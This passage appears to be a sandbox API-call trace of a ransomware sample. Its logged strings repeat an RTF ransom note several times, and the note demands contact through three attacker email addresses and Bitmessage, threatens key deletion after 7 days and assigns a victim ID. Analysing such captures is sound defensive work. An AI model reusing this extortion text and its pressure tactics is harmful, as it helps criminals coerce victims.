COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0300.132] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0300.132] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x1ef8ad8, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 